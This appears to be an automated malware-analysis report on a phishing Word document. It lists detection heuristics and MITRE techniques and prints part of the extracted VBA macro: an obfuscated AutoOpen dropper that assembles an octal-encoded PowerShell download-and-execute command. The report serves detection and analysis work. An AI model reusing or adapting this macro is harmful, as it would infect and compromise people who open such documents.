MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands, likely for downloading and executing a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its role as a dropper for malicious content.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36720 bytes |
SHA-256: d8f52fa3f5dd7a0b56377992d07196126159bda1c098a069b8bd12f3e8559752 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DzSnffm"
Sub AutoOpen()
On Error Resume Next
pFWlburiQ = BMiojBuAlEZFzW + CDate(8789372) / 1729167 / 7664528 - 993128 - Fix(4600714)
JijBjDCqU = PUbXDzWiBGzI + CDate(8277807) / 5466908 / 870945 - 392930 - Fix(6999531)
FzrSGmKHT = KuldKaNWj + CDate(9520167) / 6616248 / 9262443 - 4899276 - Fix(4413852)
alwaAnGwh = wqcTJiRPj + CDate(5938926) / 2327409 / 7617949 - 3227627 - Fix(5617428)
Application.Run "SjdDRHjdpIHO", EjGjLXR
midGUEBJa = sUojGjLNMR + CDate(6314091) / 3859742 / 9525476 - 8736440 - Fix(2431784)
BfSMuKmVV = SJAcdRnQIbpth + CDate(1847036) / 593133 / 3727829 - 9680302 - Fix(5120296)
wwSlktTYj = fJFzTwoWKljAtD + CDate(7980795) / 3412845 / 4504734 - 1545339 - Fix(9668989)
IJbMMWYUj = GIEhqkwWqa + CDate(7189845) / 4106003 / 6224150 - 1615570 - Fix(2420336)
End Sub
Function EjGjLXR()
On Error Resume Next
AhrUvXIQmZ = ("n1DCiIrIn( '' ,( '44&156<163x141<144L141d163d144:40&75j40d46o50L47@156d47o53L47x145j47i53<47x167x55i157L142o152L145@143L47j53@47<164x47<51L40&162&141x156:144x157x155@7oTiCfzIoR")
mqmmkr = tzGltNGOaDOUu + CDate(7736362) / 2064291 / 9048692 - 6289046 - Fix(1284368)
cJTDFzzcK = czLDNUbiToMb + CDate(5249813) / 5656337 / 9461547 - 2505680 - Fix(7415911)
bImKV = Mid(AhrUvXIQmZ, 8, 160)
HGjdCKUv = ("fZYiR7l90ojEi0w3QPpSINmppUPXmu03Da93<40o151L156@40&44o101<104@103i130i51j173&164d162@cUsz")
zAMzHC = nitsRSima + CDate(2664625) / 5400836 / 7599697 - 8247435 - Fix(9486610)
lBiXsU = YPTqwBXwvWO + CDate(5742895) / 1393892 / 584121 - 2336900 - Fix(50005)
kwLQVw = Mid(HGjdCKUv, 36, 50)
zSVqv = ("BANcwiZbfzM8rLuv . ((GV '*MdR*').NAMe[3,11,2]-joIn'')( [STriNg]::jOm8j5")
BsdYvOZpBWS = CPAAsMsfmRQ + CDate(7297585) / 9739012 / 4214043 - 537392 - Fix(7818544)
tPjQNYudPu = jNNWujnwfc + CDate(4643159) / 8683590 / 7466572 - 2757210 - Fix(4073958)
vOIlsvDPT = Mid(zSVqv, 17, 51)
mXjGiZFXbFF = ("1jK0q[coNvErt]::toINt16( ($_.tOstrinG() ) ,8)))} ))) Z7iYqjzsFA5JRAL")
jtWmO = nJIiMEMjTmzCv + CDate(8347457) / 6901326 / 382796 - 689387 - Fix(2128679)
fVKtnRNGj = YOFznnvDl + CDate(2346477) / 6000854 / 6982465 - 153844 - Fix(2028228)
IBmqwEDqm = Mid(mXjGiZFXbFF, 6, 48)
HEiLbAdW = ("YRC2j144:141o163i144@56x156:145x170d164<50o61@60&60i60i60@54o40<62:70@62:61j63<63&51<73j44x101:104o103jYvUKvzC33AiYCU0QN")
KtQoSiC = ViZiMUvRBbXoCw + CDate(8491006) / 2746048 / 7084548 - 5939602 - Fix(8188653)
SzWwNoWAt = tNazRKjwzBbz + CDate(8047929) / 7410013 / 5999742 - 6099448 - Fix(1365653)
XMzBFvlOz = Mid(HEiLbAdW, 5, 98)
JzNmBbDT = ("wIhqziUS0fZznlt1ahLZi51o154:56&143d157j155d57L153x105j130o107x61&170o126&57&47@56j123o160d154&151@164:50&47j77&47x51j73j44j123<104o103<40d75i40d4434SRQVJlq01oqf")
TjEYsh = DHEcRCo + CDate(9798984) / 3803111 / 9897924 - 59506 - Fix(4947410)
zIEhtI = PTMHMmARtMEESZ + CDate(4457000) / 9613731 / 2751936 - 7078399 - Fix(9184818)
ivBtihLmr = Mid(JzNmBbDT, 22, 125)
akfSfn = ("j57o162:141:171L164:150&151x147o160L145:156o56:14OzAGL2KQrVZq13wAFFBXpA7pDDvI")
qjmboS = mcEsYkKvAXzdR + CDate(185259) / 1051182 / 2819532 - 874688 - Fix(85251)
qVpmJmB = hvkcFwwv + CDate(2652668) / 2017593 / 6451894 - 7087725 - Fix(3388135)
DTGOuzlTrlH = Mid(akfSfn, 2, 48)
bbjMrY = ("dQuXqjVXt5w25wzTiTzM2SBbA2171<173L44d131&131:125L56@42j104&157L140@127@156x154i140o117:141j144<106:111&140x154o145x42o50<44L141x163i146j143o56d42L124o1WpR8FQ28")
YjvUI = kVanRTon + CDate(8787478) / 249878 / 9935585 - 9645305 - Fix(9184744)
ddrwwBpQjji = pwkSnhYkpT + CDate(6511729) / 292123 / 9853092 - 1658614 - Fix(1657172)
uwBTEs = Mid(bbjMrY, 27, 125)
EUJRzvKVhV = ("d9cwufUYQ6Zl25bdwGIJiFFw175<143j141o164o143&150&173i175j175'.SPlIt( 'ij:<@&Lxdo')| % {([CHar] ( 8ML")
KWESb = HbNcrJTanzjH + CDate(1049530) / 3152947 / 3820270 - 6209145 - Fix(5960901)
vEzUOKm = siALLOJNCVE + CDate(1464868) / 9247561 / 5847445 - 6271448 - Fix(9849
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.